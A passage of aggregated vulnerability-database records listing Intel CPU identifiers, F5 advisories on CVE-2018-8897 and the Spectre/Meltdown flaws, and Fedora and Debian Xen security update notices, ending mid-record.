"cpe:2.3:h:intel:xeon_e3_1260l:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_platinum:8158:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3740:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:lc5528:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:6287u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_e:e3825:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4360u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c2750:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4710hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:x5690:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_silver:4110:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_m3:7y32:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1265l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3210m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:ec5509:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2643:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2697_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:6100:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:940xm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1220l_v3:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:960:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:870:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon:lc5518:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2610ue:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6148f:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3320m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2377m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4510u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2330e:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:7920hq:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5_2403_v2:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_gold:6146:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2670:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3570s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:3230m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3570:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_z:z3745d:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3615qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_n:n2820:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:2600:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:4770t:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:560um:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4590s:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:2667_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:8550u:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e5:4667_v4:*:*:*:*:*:*:*", "cpe:2.3:h:intel:celeron_j:j1800:*:*:*:*:*:*:*", "cpe:2.3:h:intel:atom_c:c3508:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4830_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3720qm:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:2870_v2:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e3_1265l_v4:-:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i5:4570r:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i3:2350m:*:*:*:*:*:*:*", "cpe:2.3:h:intel:xeon_e7:4860:*:*:*:*:*:*:*", "cpe:2.3:h:intel:core_i7:3632qm:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:39:41", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "\nF5 Product Development has assigned ID 719554 (BIG-IP), ID 719747 (BIG-IQ and F5 iWorkflow), and ID 719744 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H17403481 on the **Diagnostics** &gt; **Identified** &gt; **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 | 14.1.0 \n14.0.0.3 | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n13.x | 13.0.0 - 13.1.1 | 13.1.1.2 \n12.x | 12.1.0 - 12.1.3 | 12.1.3.7 \n11.x | 11.6.0 - 11.6.3 \n11.2.1 - 11.5.8 | 11.6.3.3 \n11.5.9 \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nBIG-IQ Centralized Management | 6.x | 6.0.0 - 6.0.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux kernel \n4.x | 4.4.0 | None \n \n1 The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-03-12T19:44:00", "published": "2018-05-15T07:59:00", "id": "F5:K17403481", "href": "https://support.f5.com/csp/article/K17403481", "title": "Linux kernel vulnerability CVE-2018-8897", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-06T22:39:55", "bulletinFamily": "software", "cvelist": ["CVE-2017-5753", "CVE-2017-5754", "CVE-2017-5715"], "description": "\nF5 Product Development has assigned IDs 698651, 701445, 701447, 704490, and 704483 (BIG-IP); 702233, 702236, and 702237 (BIG-IQ); 702353, 702354, and 702355 (Enterprise Manager); 702355, 702377, and 702378 (iWorkflow); CPF-24782, CPF-24783, and CPF-24784 (Traffix); LRS-65859, LRS-65860, and LRS-65861 (LineRate) to this vulnerability. Additionally, [BIG-IP iHealth](<https://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H91229003 on the **Diagnostics** &gt; **Identified** &gt; **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 15.x | None | 15.0.0 | Medium (CVE-2017-5715) \nMedium (CVE-2017-5753) \nMedium (CVE-2017-5754) | [6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5715 \n[5.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N/E:P/RL:U/RC:C>) CVE-2017-5753 \n[6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5754 | CPU, BIOS, and kernel \n14.x | None | 14.0.02 \n13.x | 13.0.0 - 13.1.0 | 13.1.0.42 \n13.0.12 \n12.x | 12.1.0 - 12.1.3 | 12.1.3.32 \n11.x | 11.6.1 - 11.6.3 \n11.5.1 - 11.5.5 \n11.2.1 | 11.6.3.12 \n11.5.62 \nEnterprise Manager | 3.x | 3.1.1 | None | Medium (CVE-2017-5715) \nMedium (CVE-2017-5753) \nMedium (CVE-2017-5754) | [6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5715 \n[5.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N/E:P/RL:U/RC:C>) CVE-2017-5753 \n[6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5754 | CPU, BIOS, and kernel \nBIG-IQ (Cloud, Device, Security, ADC) | 4.x | 4.5.0 | None | Medium (CVE-2017-5715) \nMedium (CVE-2017-5753) \nMedium (CVE-2017-5754) | [6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5715 \n[5.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N/E:P/RL:U/RC:C>) CVE-2017-5753 \n[6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5754 | CPU, BIOS, and kernel \nBIG-IQ Centralized Management | 6.x | 6.0.0 | 6.0.12 | Medium (CVE-2017-5715) \nMedium (CVE-2017-5753) \nMedium (CVE-2017-5754) | [6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5715 \n[5.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N/E:P/RL:U/RC:C>) CVE-2017-5753 \n[6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5754 | CPU, BIOS, and kernel \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium (CVE-2017-5715) \nMedium (CVE-2017-5753) \nMedium (CVE-2017-5754) | [6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5715 \n[5.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N/E:P/RL:U/RC:C>) CVE-2017-5753 \n[6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5754 | CPU, BIOS, and kernel \nF5 iWorkflow | 2.x | 2.3.0 \n2.2.0 \n2.1.0 \n2.0.1 - 2.0.2 | None | Medium (CVE-2017-5715) \nMedium (CVE-2017-5753) \nMedium (CVE-2017-5754) | [6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5715 \n[5.3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N/E:P/RL:U/RC:C>) CVE-2017-5753 \n[6.4](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/E:F/RL:U/RC:C>) CVE-2017-5754 | CPU, BIOS, and kernel \nLineRate | 2.x | 2.6.0 | None | Medium | ** | CPU, BIOS, and kernel \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | Security bulletin build 93 (5.1.0) \nSecurity bulletin build 32 (5.0.0) | Medium (CVE-2017-5715) \nHigh (CVE-2017-5753) \nHigh (CVE-2017-5754) | [6.7](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:N>) (CVE-2017-5715) \n[8.2](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N>) (CVE-2017-5753) \n[7.9](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N>) (CVE-2017-5754) | CPU, BIOS, and kernel \n4.x | 4.0.0 - 4.4.0 | Security bulletin build 14 (4.4.0) \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n2Notes about fixes for CVE-2017-5753 (Spectre-PHT) and CVE-2017-5754 (Meltdown-US):\n\n**Important**: F5 does not plan to release an official fix for CVE-2017-5715 (Spectre-BTB) that is based on Intel's microcode updates. The rationale for this decision is based on significant performance degradation when enabling Intel's microcode fixes in our platforms. During testing of the microcode fix, F5 has observed from 10 percent to more than 50 percent performance degradation for many workloads.\n\n**Important**: Only CVE-2017-5754 (Meltdown-US) is fixed in BIG-IQ.\n\n * Performance impact: \n * CVE-2017-5753 (Spectre-PHT)\n\nF5 does not anticipate a performance impact as a result of the fix for CVE-2017-5753 Spectre-PHT.\n\n * CVE-2017-5754 (Meltdown-US)\n\nIn most scenarios, the fix for Meltdown-US has a negligible performance impact. F5 recommends testing the performance impact before deploying the fix in a production environment, or testing the fix during a maintenance window with consideration to the possible impact on your specific environment. If you encounter unacceptable performance issues in testing and choose to disable the Meltdown-US fix, you can do so by typing the following command:\n\ntmsh modify sys db kernel.pti value disable\n\n**Note:** This database variable change is applied without requirement for a reboot.\n\n**Important:** If you choose to disable the Meltdown-US fix, the system will be vulnerable to the Meltdown-US vulnerability. However, in order to take advantage of this vulnerability, the attacker must already possess the ability to run arbitrary code on the system. For non-vCMP systems, good access controls and keeping your system up-to-date with security fixes will mitigate this risk. For vCMP systems with multiple tenants, F5 recommends that you leave the Meltdown-US fix enabled.\n\n * Virtual F5 products/vCMP guests:\n\nThe Meltdown-US and Spectre-PHT fixes block the ability for those exploits to be executed on the patched OS. If the exploit allows cross-VM boundary information leaks, then a fixed VM is still vulnerable to attacks from a non-fixed VM or the host. Therefore, it is important to apply fixes to both guest VMs and the host that runs them.\n\n * Known issues:\n\nDue to a known issue with the Meltdown-US fix on BIG-IP platforms equipped with an AMD processor, the system may spontaneously reboot. Refer to the table in the **Impact** section for information about which BIG-IP platforms have an AMD processor. F5 Product Development has assigned ID 719711 to this issue. To work around the issue, you can disable the Meltdown-US fix (BIG-IP platforms with an AMD processor are not vulnerable to Meltdown-US per the table in the** Impact** section). To do so, perform the following procedure:\n\n**Note**: Performing the procedure to disable kernel page-table isolation does not disable the Spectre-PHT fix.\n\n 1. Log in to the BIG-IP command line.\n 2. Disable the kernel page-table isolation (PTI) database key by typing the following command: \n\ntmsh modify sys db kernel.pti value disable\n\n 3. Reboot the BIG-IP system by typing the following command: \n\nreboot\n\n**Note**: A reboot is required for this workaround.\n\n**Important**: This command will interrupt traffic while the BIG-IP system either fails over to a peer system or completes the reboot process. \n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nBIG-IP\n\nThe only roles on a BIG-IP system that can exploit these vulnerabilities are the Administrator, Resource Administrator, Manager, and iRules Manager roles. To mitigate against all three vulnerabilities, ensure that you limit access to these roles to only trusted employees.\n\nTo mitigate the Spectre-BTB vulnerability in multi-tenancy vCMP configurations, ensure that all guests are set to at least two **Cores Per Guest**.\n\nTraffix SDC\n\nFixes for CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754 are available from F5 via the following security bulletins for Traffix SDC 5.1.0, 5.0.0, and 4.4.0:\n\n * **5.1.0** \\- security bulletin build 93\n * **5.0.0** \\- security bulletin build 32\n * **4.4.0** \\- security bulletin build 14\n\nFor more information, contact your Traffix SDC Technical Support representative.\n\n * <https://googleprojectzero.blogspot.ca/2018/01/reading-privileged-memory-with-side.html>\n\n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n\n * <https://meltdownattack.com/>\n\n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2019-05-28T22:51:00", "published": "2018-01-04T04:46:00", "id": "F5:K91229003", "href": "https://support.f5.com/csp/article/K91229003", "title": "Side-channel processor vulnerabilities CVE-2017-5715, CVE-2017-5753, and CVE-2017-5754", "type": "f5", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7540", "CVE-2018-7541", "CVE-2018-7542"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-03-06T17:36:32", "published": "2018-03-06T17:36:32", "id": "FEDORA:520A96076F57", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: xen-4.9.1-5.fc27", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7540", "CVE-2018-7541", "CVE-2018-7542"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-03-20T17:37:29", "published": "2018-03-20T17:37:29", "id": "FEDORA:977BB60A6180", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: xen-4.8.3-3.fc26", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-05-12T18:23:12", "published": "2018-05-12T18:23:12", "id": "FEDORA:3FBD8604970A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-2.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-05-26T20:47:24", "published": "2018-05-26T20:47:24", "id": "FEDORA:6CE076015F62", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-3.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-06-29T08:43:54", "published": "2018-06-29T08:43:54", "id": "FEDORA:6E66862A5C82", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-4.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15588", "CVE-2017-15589", "CVE-2017-1559", "CVE-2017-15590", "CVE-2017-15591", "CVE-2017-15592", "CVE-2017-15593", "CVE-2017-15594", "CVE-2017-15595", "CVE-2017-17045", "CVE-2017-17563", "CVE-2017-17564", "CVE-2017-17565", "CVE-2017-17566", "CVE-2018-10471", "CVE-2018-10472", "CVE-2018-7540", "CVE-2018-7541", "CVE-2018-7542"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-05-01T13:42:16", "published": "2018-05-01T13:42:16", "id": "FEDORA:698AD6087A96", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: xen-4.9.2-2.fc27", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-10982", "CVE-2018-12891", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-3639", "CVE-2018-3665", "CVE-2018-8897"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2018-07-03T16:56:43", "published": "2018-07-03T16:56:43", "id": "FEDORA:6A9A16095B29", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: xen-4.10.1-5.fc28", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-09-12T00:53:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7540", "CVE-2018-7542", "CVE-2018-7541"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4131-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMarch 04, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nCVE ID : CVE-2018-7540 CVE-2018-7541 CVE-2018-7542\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-7540\n\n Jann Horn discovered that missing checks in page table freeing may\n result in denial of service.\n\nCVE-2018-7541\n\n Jan Beulich discovered that incorrect error handling in grant table\n checks may result in guest-to-host denial of service and potentially\n privilege escalation.\n\nCVE-2018-7542\n\n Ian Jackson discovered that insufficient handling of x86 PVH guests\n without local APICs may result in guest-to-host denial of service.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+comet2+shim4.10.0+comet3-1+deb9u5.\n\nWe recommend that you upgrade your xen packages.\n\nFor the detailed security status of xen please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xen\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-03-04T10:00:04", "published": "2018-03-04T10:00:04", "id": "DEBIAN:DSA-4131-1:D22BC", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00057.html", "title": "[SECURITY] [DSA 4131-1] xen security update", "type": "debian", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-09-12T01:03:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4201-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nMay 15, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nCVE ID : CVE-2018-8897 CVE-2018-10471 CVE-2018-10472 CVE-2018-10981 \n CVE-2018-10982\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\n\n Andy Lutomirski and Nick Peterson discovered that incorrect handling\n of debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\n\n An error was discovered in the mitigations against Meltdown which\n could result in denial of service.\n\nCVE-2018-10472\n\n Anthony Perard discovered that incorrect parsing of CDROM images\n can result in information disclosure.\n\nCVE-2018-10981\n\n Jan Beulich discovered that malformed device models could result\n in denial of service.\n\nCVE-2018-10982\n\n Roger Pau Monne discovered that incorrect handling of high precision\n event timers could result in denial of service and potentially\n privilege escalation.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+comet2+shim4.10.0+comet3-1+deb9u6.\n\nWe recommend that you upgrade your xen packages.\n\nFor the detailed security status of xen please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/xen\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-05-15T20:04:28", "published": "2018-05-15T20:04:28", "id": "DEBIAN:DSA-4201-1:7E613", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00128.html", "title": "[SECURITY] [DSA 4201-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:02", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7540", "CVE-2018-7541"], "description": "Package : xen\nVersion : 4.1.6.lts1-13\nCVE ID : CVE-2018-7540 CVE-2018-7541\n\nMultiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, informations leaks or privilege\nescalation.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n4.1.6.lts1-13.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2018-03-06T06:48:15", "published": "2018-03-06T06:48:15", "id": "DEBIAN:DLA-1300-1:11474", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201803/msg00003.html", "title": "[SECURITY] [DLA 1300-1] xen security update", "type": "debian", "cvss": {"score": 6.1, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-08-12T00:51:18", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7540", "CVE-2018-15470", "CVE-2018-12893", "CVE-2018-7541", "CVE-2018-15469", "CVE-2018-8897", "CVE-2018-12891"], "description": "Package : xen\nVersion : 4.4.4lts4-0+deb8u1\nCVE ID : CVE-2018-7540 CVE-2018-7541 CVE-2018-8897 CVE-2018-12891 \n CVE-2018-12893 CVE-2018-15469 CVE-2018-15470\n\nMultiple vulnerabilities have 